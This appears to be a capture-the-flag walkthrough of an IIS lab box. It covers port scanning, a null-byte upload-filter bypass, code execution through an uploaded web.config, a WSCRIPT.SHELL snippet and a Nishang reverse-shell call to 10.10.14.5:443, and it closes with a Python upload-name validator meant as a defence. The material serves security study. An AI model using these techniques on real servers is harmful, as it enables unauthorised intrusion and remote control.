Recon

nmap

Nmap only shows port 80, running IIS:

nmap -p- --min-rate 5000 -oA nmap/alltcp 10.10.10.93
Nmap done: 1 IP address (1 host up) scanned in 10.92 seconds

nmap -p 80 -sC -sV -oA nmap/initial 10.10.10.93
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Nmap done: 1 IP address (1 host up) scanned in 26.76 seconds

Site

The site itself just gives an image of a wizard, merlin.jpg. The response headers indicate that the site is powered by

gobuster -u -w /usr/share/wordlists/dirbuster/ -t 30 -o gobuster_root -x aspx
Wordlist : /usr/share/wordlists/dirbuster/

Transfer.aspx / UploadedFiles

General Functionality

transfer.aspx presents a simple form with “Browse…” and “Upload” buttons. After giving it a simple png file (in my example, a screen capture of the merlin image), the site reports success, and the image can be seen at :

Upload aspx

I’ll grab a copy of the aspx shell that comes with kali, and try to upload it. On first attempt to upload, the page rejects it.

I can bypass the filter by adding a null byte after our aspx so that the app thinks it’s a jpg, but then saves it as an aspx. This is an improvement, as I know we’ve passed the upload check. Still, when I then view it, it returns an error.

web.config RCE

At this point, it’s hard to say what is causing the aspx webshell not to execute, but the error does provide a suggestion to modify the web.config file. The web.config file has settings and configuration data for web applications on IIS servers. It would be really interesting if I could modify it via upload. But even more interestingly, according to this post, I can potentially include asp code in the web.config and get it to run.

I started with a template from the post above, and uploaded it to the site. On visiting, it returns 3, which means the code executed.

It’s certainly possible to get a webshell, but I’ll notice that the UploadedFiles path is being cleared out every few minutes. So I’ll opt to go directly to a reverse shell.

Now, since my asp skills are quite low, I started with the asp webshell that comes on kali (/usr/share/webshells/asp/cmdasp.asp), and started reading it to determine how code is actually executed. This part seemed most interesting:

' - create the COM objects that we will be using - '
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")

First, grab a copy of Nishang’s Invoke-PowerShellTcp.ps1. Then add a line at the end to invoke a callback to me:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 443
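Both the null-byte bypass and the web.config upload described above come down to the same root cause: the upload handler validates a different string from the one that ends up on disk. The block below is an added example, not code from this writeup or from the target application, and it is written in Python rather than the target's ASP.NET. It shows a naive check that mirrors the behaviour the writeup describes (it only looks at the tail of the submitted name), a model of how a NUL byte truncates the stored name, and a hardened validator that rejects control characters, reserved IIS file names such as web.config, and anything without a single allow-listed extension. The function names, the allow-list and the reserved-name set are my own assumptions.

```python
# Added example (not from the original writeup): why "cmd.aspx\x00.jpg" slips
# past a tail-only extension check, and a hardened validator for upload names.
import os
import posixpath

# Assumed allow-list for an image-upload form like transfer.aspx.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}
# Names IIS interprets as configuration; the writeup shows web.config can
# carry executable ASP, so these are refused whatever their extension says.
RESERVED_NAMES = {"web.config", "global.asax"}


def naive_is_allowed(filename: str) -> bool:
    """The kind of check the vulnerable form appears to do: inspect only the
    end of the submitted string. 'cmd.aspx\\x00.jpg' ends in '.jpg' and passes."""
    return filename.lower().endswith(tuple(ALLOWED_EXTENSIONS))


def stored_name_c_string(filename: str) -> str:
    """Model of a component that treats the name as a NUL-terminated C string:
    everything after the first NUL is dropped, so the file is written as
    'cmd.aspx' even though the check above saw a '.jpg'."""
    return filename.split("\x00", 1)[0]


def sanitize_upload_name(filename: str):
    """Return the exact basename the application may write to disk, or None
    if the upload must be refused. The caller must store under the returned
    name, never under the raw submitted one."""
    # 1. No control characters at all; a NUL in a filename is never legitimate.
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in filename):
        return None
    # 2. Reduce to a bare basename so separators cannot steer the write path.
    base = posixpath.basename(filename.replace("\\", "/"))
    if base in ("", ".", ".."):
        return None
    # 3. Reserved IIS names are refused regardless of extension.
    if base.lower() in RESERVED_NAMES:
        return None
    # 4. Exactly one extension, and it must be on the allow-list.
    root, ext = os.path.splitext(base)
    if not root or ext.lower() not in ALLOWED_EXTENSIONS:
        return None
    # 5. Conservative: refuse double extensions such as 'cmd.aspx.jpg'.
    if "." in root:
        return None
    return base


if __name__ == "__main__":
    # Constructed sample names, not taken from the box.
    for name in ["merlin.png", "cmd.aspx\x00.jpg", "web.config", "cmd.aspx.jpg"]:
        print(repr(name), "naive:", naive_is_allowed(name),
              "stored-as:", repr(stored_name_c_string(name)),
              "hardened:", repr(sanitize_upload_name(name)))
```

The naive check and the truncating store are the two halves of the bypass: the first accepts the name, the second writes a different one. The hardened version validates the name it will actually write and nothing else, which is the property worth asserting in a code review of any upload handler.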